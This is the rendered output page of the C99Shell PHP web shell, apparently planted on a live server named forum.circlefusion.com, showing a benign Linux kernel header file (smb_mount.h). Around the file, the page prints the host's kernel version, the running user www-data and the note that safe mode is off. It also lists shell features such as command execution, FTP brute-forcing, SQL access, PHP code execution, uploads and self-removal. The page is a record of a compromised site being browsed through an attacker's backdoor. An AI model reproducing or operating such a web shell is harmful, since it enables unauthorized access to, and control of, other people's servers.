!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g. PHP/5.2.4-2ubuntu5.12 

uname -a: Linux forum.circlefusion.com 2.6.24-19-server #1 SMP Wed Jun 18 15:18:00 UTC 2008 i686 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/src/linux-headers-2.6.24-28/include/linux/   drwxr-xr-x
Free 1.06 GB of 97.11 GB (1.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     smb_mount.h (1.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*
 *  smb_mount.h
 *
 *  Copyright (C) 1995, 1996 by Paal-Kr. Engstad and Volker Lendecke
 *  Copyright (C) 1997 by Volker Lendecke
 *
 */

#ifndef _LINUX_SMB_MOUNT_H
#define _LINUX_SMB_MOUNT_H

#include <linux/types.h>

#define SMB_MOUNT_VERSION    6

struct smb_mount_data {
    int version;
    __kernel_uid_t mounted_uid; /* Who may umount() this filesystem? */
    __kernel_uid_t uid;
    __kernel_gid_t gid;
    __kernel_mode_t file_mode;
    __kernel_mode_t dir_mode;
};


#ifdef __KERNEL__

/* "vers" in big-endian */
#define SMB_MOUNT_ASCII 0x76657273

#define SMB_MOUNT_OLDVERSION    6
#undef SMB_MOUNT_VERSION
#define SMB_MOUNT_VERSION    7

/* flags */
#define SMB_MOUNT_WIN95        0x0001    /* Win 95 server */
#define SMB_MOUNT_OLDATTR    0x0002    /* Use core getattr (Win 95 speedup) */
#define SMB_MOUNT_DIRATTR    0x0004    /* Use find_first for getattr */
#define SMB_MOUNT_CASE        0x0008    /* Be case sensitive */
#define SMB_MOUNT_UNICODE    0x0010    /* Server talks unicode */
#define SMB_MOUNT_UID        0x0020  /* Use user specified uid */
#define SMB_MOUNT_GID        0x0040  /* Use user specified gid */
#define SMB_MOUNT_FMODE        0x0080  /* Use user specified file mode */
#define SMB_MOUNT_DMODE        0x0100  /* Use user specified dir mode */

struct smb_mount_data_kernel {
    int version;

    uid_t mounted_uid;    /* Who may umount() this filesystem? */
    uid_t uid;
    gid_t gid;
    mode_t file_mode;
    mode_t dir_mode;

    u32 flags;

        /* maximum age in jiffies (inode, dentry and dircache) */
    int ttl;

    struct smb_nls_codepage codepage;
};

#endif

#endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0056 ]--